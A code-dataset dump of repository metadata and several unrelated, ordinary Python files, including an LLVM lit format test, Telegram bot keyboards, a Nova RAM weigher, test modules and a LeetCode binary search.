6ad4b0307023ca0f07b1c891343ae1a90f5a5ad5 | 6,436 | py | Python | llvm/utils/lit/tests/shtest-format.py | medismailben/llvm-project | e334a839032fe500c3bba22bf976ab7af13ce1c1 | [
"Apache-2.0"
] | 158 | 2016-07-21T10:45:05.000Z | 2022-03-25T00:56:20.000Z | llvm/utils/lit/tests/shtest-format.py | medismailben/llvm-project | e334a839032fe500c3bba22bf976ab7af13ce1c1 | [
"Apache-2.0"
] | 59 | 2019-02-26T18:57:27.000Z | 2020-08-04T20:49:55.000Z | llvm/utils/lit/tests/shtest-format.py | medismailben/llvm-project | e334a839032fe500c3bba22bf976ab7af13ce1c1 | [
"Apache-2.0"
] | 62 | 2016-08-29T17:28:11.000Z | 2021-12-29T17:55:58.000Z | # Check the various features of the ShTest format.
#
# RUN: rm -f %t.xml
# RUN: not %{lit} -j 1 -v %{inputs}/shtest-format --xunit-xml-output %t.xml > %t.out
# RUN: FileCheck < %t.out %s
# RUN: FileCheck --check-prefix=XUNIT < %t.xml %s
# END.
# CHECK: -- Testing:
# CHECK: PASS: shtest-format :: argv0.txt
# CHECK: FAIL: shtest-format :: external_shell/fail.txt
# CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail.txt' FAILED ***
# CHECK: Command Output (stdout):
# CHECK-NEXT: --
# CHECK-NEXT: line 1: failed test output on stdout
# CHECK-NEXT: line 2: failed test output on stdout
# CHECK: Command Output (stderr):
# CHECK-NEXT: --
# CHECK-NEXT: cat{{(\.exe)?}}: {{cannot open does-not-exist|does-not-exist: No such file or directory}}
# CHECK: --
# CHECK: FAIL: shtest-format :: external_shell/fail_with_bad_encoding.txt
# CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail_with_bad_encoding.txt' FAILED ***
# CHECK: Command Output (stdout):
# CHECK-NEXT: --
# CHECK-NEXT: a line with bad encoding:
# CHECK: --
# CHECK: PASS: shtest-format :: external_shell/pass.txt
# CHECK: FAIL: shtest-format :: fail.txt
# CHECK-NEXT: *** TEST 'shtest-format :: fail.txt' FAILED ***
# CHECK-NEXT: Script:
# CHECK-NEXT: --
# CHECK-NEXT: printf "line 1
# CHECK-NEXT: false
# CHECK-NEXT: --
# CHECK-NEXT: Exit Code: 1
#
# CHECK: Command Output (stdout):
# CHECK-NEXT: --
# CHECK-NEXT: $ ":" "RUN: at line 1"
# CHECK-NEXT: $ "printf"
# CHECK-NEXT: # command output:
# CHECK-NEXT: line 1: failed test output on stdout
# CHECK-NEXT: line 2: failed test output on stdout
# CHECK: UNRESOLVED: shtest-format :: no-test-line.txt
# CHECK: PASS: shtest-format :: pass.txt
# CHECK: UNSUPPORTED: shtest-format :: requires-missing.txt
# CHECK: PASS: shtest-format :: requires-present.txt
# CHECK: UNRESOLVED: shtest-format :: requires-star.txt
# CHECK: UNSUPPORTED: shtest-format :: requires-triple.txt
# CHECK: PASS: shtest-format :: unsupported-expr-false.txt
# CHECK: UNSUPPORTED: shtest-format :: unsupported-expr-true.txt
# CHECK: UNRESOLVED: shtest-format :: unsupported-star.txt
# CHECK: UNSUPPORTED: shtest-format :: unsupported_dir/some-test.txt
# CHECK: PASS: shtest-format :: xfail-expr-false.txt
# CHECK: XFAIL: shtest-format :: xfail-expr-true.txt
# CHECK: XFAIL: shtest-format :: xfail-feature.txt
# CHECK: XFAIL: shtest-format :: xfail-target.txt
# CHECK: XFAIL: shtest-format :: xfail.txt
# CHECK: XPASS: shtest-format :: xpass.txt
# CHECK-NEXT: *** TEST 'shtest-format :: xpass.txt' FAILED ***
# CHECK-NEXT: Script
# CHECK-NEXT: --
# CHECK-NEXT: true
# CHECK-NEXT: --
# CHECK: Testing Time
# CHECK: Unexpected Passing Tests (1)
# CHECK: shtest-format :: xpass.txt
# CHECK: Failing Tests (3)
# CHECK: shtest-format :: external_shell/fail.txt
# CHECK: shtest-format :: external_shell/fail_with_bad_encoding.txt
# CHECK: shtest-format :: fail.txt
# CHECK: Expected Passes : 7
# CHECK: Expected Failures : 4
# CHECK: Unsupported Tests : 4
# CHECK: Unresolved Tests : 3
# CHECK: Unexpected Passes : 1
# CHECK: Unexpected Failures: 3
# XUNIT: <?xml version="1.0" encoding="UTF-8" ?>
# XUNIT-NEXT: <testsuites>
# XUNIT-NEXT: <testsuite name="shtest-format" tests="22" failures="7" skipped="4">
# XUNIT: <testcase classname="shtest-format.shtest-format" name="argv0.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.external_shell" name="fail.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.external_shell" name="fail_with_bad_encoding.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.external_shell" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="fail.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="no-test-line.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-missing.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of: a-missing-feature" />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-present.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-star.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-triple.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of: x86_64" />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-true.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of configuration." />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-star.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: <testcase classname="shtest-format.unsupported_dir" name="some-test.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT:<skipped message="Skipping because of configuration." />
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-true.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-feature.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-target.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail.txt" time="{{[0-9]+\.[0-9]+}}"/>
# XUNIT: <testcase classname="shtest-format.shtest-format" name="xpass.txt" time="{{[0-9]+\.[0-9]+}}">
# XUNIT-NEXT: <failure{{[ ]*}}>
# XUNIT: </failure>
# XUNIT-NEXT: </testcase>
# XUNIT: </testsuite>
# XUNIT-NEXT: </testsuites>
| 39.243902 | 120 | 0.669204 | 886 | 6,436 | 4.832957 | 0.120767 | 0.19617 | 0.107894 | 0.137319 | 0.749883 | 0.68823 | 0.612798 | 0.585708 | 0.564222 | 0.498132 | 0 | 0.019741 | 0.110628 | 6,436 | 163 | 121 | 39.484663 | 0.728337 | 0.95463 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6adb553dce195998456694bd789763a78896d906 | 221 | py | Python | setup.py | mikanbox/certbeginner | d147ddac13a8308ec1e07b56c872eb46c5a4a815 | [
"Apache-2.0"
] | null | null | null | setup.py | mikanbox/certbeginner | d147ddac13a8308ec1e07b56c872eb46c5a4a815 | [
"Apache-2.0"
] | null | null | null | setup.py | mikanbox/certbeginner | d147ddac13a8308ec1e07b56c872eb46c5a4a815 | [
"Apache-2.0"
] | null | null | null | from setuptools import setup
setup(
name='certbeginner',
version='1.0.0',
install_requires=['argparse'],
entry_points={
"console_scripts": ['crtbg = src.app:main']
}
) | 20.090909 | 55 | 0.552036 | 22 | 221 | 5.409091 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.307692 | 221 | 11 | 56 | 20.090909 | 0.75817 | 0 | 0 | 0 | 0 | 0 | 0.27027 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ae35abc4a7d4c66d615c6151ad2f2e33c8e4033 | 480 | py | Python | env.py | masanobu48154/ansible_build_wp | 9e5741957cdb1c9d293ea0f7962bc8a4eb2d23c8 | [
"BSD-3-Clause"
] | null | null | null | env.py | masanobu48154/ansible_build_wp | 9e5741957cdb1c9d293ea0f7962bc8a4eb2d23c8 | [
"BSD-3-Clause"
] | null | null | null | env.py | masanobu48154/ansible_build_wp | 9e5741957cdb1c9d293ea0f7962bc8a4eb2d23c8 | [
"BSD-3-Clause"
] | null | null | null | #!user/bin/python
class MyEnv:
"""
"""
def __init__(self):
self.my_env = {
"subnet": "<your_lab_subnet/mask>",
"gateway": "<your_lab_gateway_ip_address>",
"ansible_addr": "<ansible_container_ip_address>",
"web_addr": "<wev_container_ip_address>",
"db_addr": "<db_container_ip_address>",
"phsical_nic": "<NIC name of docker host>",
"db_password": "<mysql_password>"
}
| 30 | 61 | 0.55 | 51 | 480 | 4.666667 | 0.607843 | 0.151261 | 0.226891 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295833 | 480 | 15 | 62 | 32 | 0.704142 | 0.033333 | 0 | 0 | 0 | 0 | 0.519912 | 0.292035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0a783bd4b58da85e29e93464a57661225beb40fd | 1,545 | py | Python | keyboards.py | Liubasia/tg-secret-santa-bot | a361fada02c7cdbc88f47485f8ab111f68435344 | [
"MIT"
] | 7 | 2021-11-26T15:39:34.000Z | 2021-12-20T13:20:02.000Z | keyboards.py | Liubasia/tg-secret-santa-bot | a361fada02c7cdbc88f47485f8ab111f68435344 | [
"MIT"
] | 8 | 2021-11-20T23:04:17.000Z | 2022-02-02T11:19:20.000Z | keyboards.py | Liubasia/tg-secret-santa-bot | a361fada02c7cdbc88f47485f8ab111f68435344 | [
"MIT"
] | 2 | 2021-12-01T18:04:40.000Z | 2022-01-16T03:38:18.000Z | from telegram import InlineKeyboardMarkup, InlineKeyboardButton, Message
from emojis import Emoji
from config import config
def secret_santa(chat_id: int, bot_username: str, participants_count: int = 0):
# knowing the message id is not really needed because a caht can only have one ongoing secret chat
deeplink_url = f"https://t.me/{bot_username}?start={chat_id}"
keyboard = [
[InlineKeyboardButton(f"{Emoji.LIST} join", url=deeplink_url)],
[InlineKeyboardButton(f"{Emoji.CROSS} cancel", callback_data=f"cancel")],
]
if participants_count:
unsubscribe_button = InlineKeyboardButton(f"{Emoji.FREEZE} leave", callback_data=f"leave")
keyboard[0].append(unsubscribe_button)
if participants_count >= config.santa.min_participants:
start_button = InlineKeyboardButton(f"{Emoji.SANTA} start match", callback_data=f"match")
keyboard[1].append(start_button)
return InlineKeyboardMarkup(keyboard)
def joined_message(chat_id: int):
return InlineKeyboardMarkup(
[[
InlineKeyboardButton(f"{Emoji.FREEZE} leave", callback_data=f"private:leave:{chat_id}"),
InlineKeyboardButton(f"{Emoji.LIST} update your name", callback_data=f"private:updatename:{chat_id}")
]]
)
def revoke():
return InlineKeyboardMarkup([[InlineKeyboardButton(f"{Emoji.CROSS} revoke", callback_data=f"revoke")]])
def new_santa():
return InlineKeyboardMarkup([[InlineKeyboardButton(f"{Emoji.TREE} new Secret Santa", callback_data=f"newsanta")]])
| 36.785714 | 118 | 0.72233 | 183 | 1,545 | 5.95082 | 0.377049 | 0.15427 | 0.191001 | 0.129477 | 0.211203 | 0.091827 | 0.091827 | 0.091827 | 0 | 0 | 0 | 0.002318 | 0.16246 | 1,545 | 41 | 119 | 37.682927 | 0.839258 | 0.062136 | 0 | 0 | 0 | 0 | 0.210235 | 0.03527 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0.111111 | 0.111111 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
0a7b1a96f35172e4fdd90c6e4f154a82c0020afe | 1,350 | py | Python | nova/scheduler/weights/ram.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 2 | 2021-10-11T04:56:25.000Z | 2022-02-16T08:49:29.000Z | nova/scheduler/weights/ram.py | ljzjohnson/nova | 87e1951a1b8c03b9ecdf8f75610d14690b61f272 | [
"Apache-2.0"
] | 132 | 2017-03-27T11:31:52.000Z | 2022-03-30T08:45:02.000Z | nova/scheduler/weights/ram.py | ljzjohnson/nova | 87e1951a1b8c03b9ecdf8f75610d14690b61f272 | [
"Apache-2.0"
] | 8 | 2017-03-27T07:50:38.000Z | 2020-02-14T16:55:56.000Z | # Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
RAM Weigher. Weigh hosts by their RAM usage.
The default is to spread instances across all hosts evenly. If you prefer
stacking, you can set the 'ram_weight_multiplier' option to a negative
number and the weighing has the opposite effect of the default.
"""
import nova.conf
from nova.scheduler import weights
CONF = nova.conf.CONF
class RAMWeigher(weights.BaseHostWeigher):
minval = 0
def weight_multiplier(self):
"""Override the weight multiplier."""
return CONF.filter_scheduler.ram_weight_multiplier
def _weigh_object(self, host_state, weight_properties):
"""Higher weights win. We want spreading to be the default."""
return host_state.free_ram_mb
| 34.615385 | 78 | 0.734815 | 195 | 1,350 | 5.020513 | 0.610256 | 0.061287 | 0.026558 | 0.032686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008318 | 0.198519 | 1,350 | 38 | 79 | 35.526316 | 0.896488 | 0.70963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0a8328b9a3f6b6cbda1b1ad098e77cbfe813a558 | 682 | py | Python | twisted/lore/test/test_scripts.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 7 | 2015-04-28T13:26:11.000Z | 2020-02-09T17:01:04.000Z | twisted/lore/test/test_scripts.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 4 | 2017-02-19T23:58:13.000Z | 2019-11-01T15:31:22.000Z | twisted/lore/test/test_scripts.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 6 | 2017-02-13T09:11:02.000Z | 2021-06-29T11:22:18.000Z | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for the command-line interface to lore.
"""
from twisted.trial.unittest import TestCase
from twisted.scripts.test.test_scripts import ScriptTestsMixin
from twisted.python.test.test_shellcomp import ZshScriptTestMixin
class ScriptTests(TestCase, ScriptTestsMixin):
"""
Tests for all one of lore's scripts.
"""
def test_lore(self):
self.scriptTest("lore/lore")
class ZshIntegrationTestCase(TestCase, ZshScriptTestMixin):
"""
Test that zsh completion functions are generated without error
"""
generateFor = [('lore', 'twisted.lore.scripts.lore.Options')]
| 24.357143 | 66 | 0.73607 | 79 | 682 | 6.316456 | 0.594937 | 0.066132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165689 | 682 | 27 | 67 | 25.259259 | 0.876977 | 0.313783 | 0 | 0 | 0 | 0 | 0.107226 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0a83ff2d5a326326c4c83e273dca2750c377b990 | 505 | py | Python | tests/app/test_encryption.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | null | null | null | tests/app/test_encryption.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | 51 | 2019-07-03T14:11:19.000Z | 2019-07-08T12:24:55.000Z | tests/app/test_encryption.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | null | null | null | from app.encryption import CryptoSigner
signer = CryptoSigner()
def test_should_sign_content(notify_api):
signer.init_app(notify_api)
assert signer.sign("this") != "this"
def test_should_verify_content(notify_api):
signer.init_app(notify_api)
signed = signer.sign("this")
assert signer.verify(signed) == "this"
def test_should_sign_json(notify_api):
signer.init_app(notify_api)
signed = signer.sign({"this": "that"})
assert signer.verify(signed) == {"this": "that"}
| 24.047619 | 52 | 0.718812 | 68 | 505 | 5.073529 | 0.294118 | 0.156522 | 0.113043 | 0.165217 | 0.588406 | 0.426087 | 0.426087 | 0.426087 | 0.295652 | 0.295652 | 0 | 0 | 0.148515 | 505 | 20 | 53 | 25.25 | 0.802326 | 0 | 0 | 0.230769 | 0 | 0 | 0.063366 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a88dbf2d60acbd416ea1b0210d8dbb9c4c7f0c3 | 370 | py | Python | fpipe/utils/meta.py | vkvam/fpipe | 2905095f46923c6c4c460c3d154544b654136df4 | [
"MIT"
] | 18 | 2019-12-16T17:55:57.000Z | 2020-10-21T23:25:40.000Z | fpipe/utils/meta.py | vkvam/fpipe | 2905095f46923c6c4c460c3d154544b654136df4 | [
"MIT"
] | 23 | 2019-12-11T14:15:08.000Z | 2020-02-17T12:53:21.000Z | fpipe/utils/meta.py | vkvam/fpipe | 2905095f46923c6c4c460c3d154544b654136df4 | [
"MIT"
] | null | null | null | from typing import Type
from fpipe.exceptions import FileDataException
from fpipe.file import File
from fpipe.meta.abstract import FileData, T
def meta_prioritized(t: Type[FileData[T]], *sources: File) -> T:
error = FileDataException(t)
for s in sources:
try:
return s[t]
except FileDataException:
pass
raise error
| 23.125 | 64 | 0.675676 | 47 | 370 | 5.297872 | 0.510638 | 0.108434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254054 | 370 | 15 | 65 | 24.666667 | 0.902174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.083333 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
0a8af313398e9300947e1c20630e8f3c229d4399 | 332 | py | Python | src/experiment.py | Hiestaa/my-tornado-media-library | 6decb97ad02d0ee1613c53dbb1729474e2ea9b42 | [
"MIT"
] | 1 | 2019-09-14T20:46:23.000Z | 2019-09-14T20:46:23.000Z | src/experiment.py | Hiestaa/my-tornado-media-library | 6decb97ad02d0ee1613c53dbb1729474e2ea9b42 | [
"MIT"
] | null | null | null | src/experiment.py | Hiestaa/my-tornado-media-library | 6decb97ad02d0ee1613c53dbb1729474e2ea9b42 | [
"MIT"
] | 1 | 2021-08-24T03:20:46.000Z | 2021-08-24T03:20:46.000Z | import sys
import experiments
from experiments import *
# from experiments import facedetect_facelib
# print (dir(experiments.facedetect_facelib))
if __name__ == '__main__':
if len(sys.argv) > 1:
for name in sys.argv[1:]:
getattr(experiments, name).run()
else:
print("No experiment specified.") | 25.538462 | 45 | 0.680723 | 40 | 332 | 5.4 | 0.55 | 0.138889 | 0.194444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007663 | 0.213855 | 332 | 13 | 46 | 25.538462 | 0.819923 | 0.259036 | 0 | 0 | 0 | 0 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
0a9605e2ff3f7c01f3377395f7463b60a8dd6e36 | 499 | py | Python | 35. Search Insert Position/main.py | Competitive-Programmers-Community/LeetCode | 841fdee805b1a626e9f1cd0e12398d25054638af | [
"MIT"
] | 2 | 2019-10-05T09:48:20.000Z | 2019-10-05T15:40:01.000Z | 35. Search Insert Position/main.py | Competitive-Programmers-Community/LeetCode | 841fdee805b1a626e9f1cd0e12398d25054638af | [
"MIT"
] | null | null | null | 35. Search Insert Position/main.py | Competitive-Programmers-Community/LeetCode | 841fdee805b1a626e9f1cd0e12398d25054638af | [
"MIT"
] | 3 | 2020-09-27T05:48:30.000Z | 2021-08-13T10:07:08.000Z | class Solution:
def searchInsert(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
low = 0
high = len(nums) - 1
while low <= high:
mid = (low + high)//2
if nums[mid] == target:
return mid
elif nums[mid] > target:
high = mid - 1
elif nums[mid] < target:
low = mid + 1
return low
| 23.761905 | 41 | 0.398798 | 51 | 499 | 3.901961 | 0.431373 | 0.105528 | 0.19598 | 0.170854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.498998 | 499 | 20 | 42 | 24.95 | 0.776 | 0.102204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a99bfa3122580b534d14c313f5b6c5b6c5b4929 | 517 | py | Python | hyperion/torch/archs/net_arch.py | jsalt2019-diadet/hyperion | 14a11436d62f3c15cd9b1f70bcce3eafbea2f753 | [
"Apache-2.0"
] | 9 | 2019-09-22T05:19:59.000Z | 2022-03-05T18:03:37.000Z | hyperion/torch/archs/net_arch.py | jsalt2019-diadet/hyperion | 14a11436d62f3c15cd9b1f70bcce3eafbea2f753 | [
"Apache-2.0"
] | null | null | null | hyperion/torch/archs/net_arch.py | jsalt2019-diadet/hyperion | 14a11436d62f3c15cd9b1f70bcce3eafbea2f753 | [
"Apache-2.0"
] | 4 | 2019-10-10T06:34:05.000Z | 2022-03-05T18:03:56.000Z | """
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from six.moves import xrange
import numpy as np
import torch.nn as nn
class NetArch(nn.Module):
@property
def context(self):
return 0
def get_config(self):
config = {
'class_name': self.__class__.__name__}
return config
| 19.884615 | 66 | 0.702128 | 69 | 517 | 4.913043 | 0.608696 | 0.088496 | 0.141593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.216634 | 517 | 25 | 67 | 20.68 | 0.814815 | 0.235977 | 0 | 0 | 0 | 0 | 0.025974 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0.071429 | 0.785714 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0aab5fb09294e4ac352bacfb1b87c2c63ee5dbe5 | 1,597 | py | Python | services/traction/acapy_wrapper/models/input_descriptors.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/acapy_wrapper/models/input_descriptors.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/acapy_wrapper/models/input_descriptors.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | # coding: utf-8
from __future__ import annotations
from datetime import date, datetime # noqa: F401
import re # noqa: F401
from typing import Any, Dict, List, Optional # noqa: F401
from pydantic import AnyUrl, BaseModel, EmailStr, validator # noqa: F401
from acapy_wrapper.models.constraints import Constraints
from acapy_wrapper.models.schemas_input_descriptor_filter import (
SchemasInputDescriptorFilter,
)
def schema_field(string: str) -> str:
if string == "schema":
return "x_schema"
return string
class InputDescriptors(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
InputDescriptors - a model defined in OpenAPI
constraints: The constraints of this InputDescriptors [Optional].
group: The group of this InputDescriptors [Optional].
id: The id of this InputDescriptors [Optional].
metadata: The metadata of this InputDescriptors [Optional].
name: The name of this InputDescriptors [Optional].
purpose: The purpose of this InputDescriptors [Optional].
schema: The schema of this InputDescriptors [Optional].
"""
constraints: Optional[Constraints] = None
group: Optional[List[str]] = None
id: Optional[str] = None
metadata: Optional[Dict[str, Any]] = None
name: Optional[str] = None
purpose: Optional[str] = None
x_schema: Optional[SchemasInputDescriptorFilter] = None
class Config:
alias_generator = schema_field
InputDescriptors.update_forward_refs()
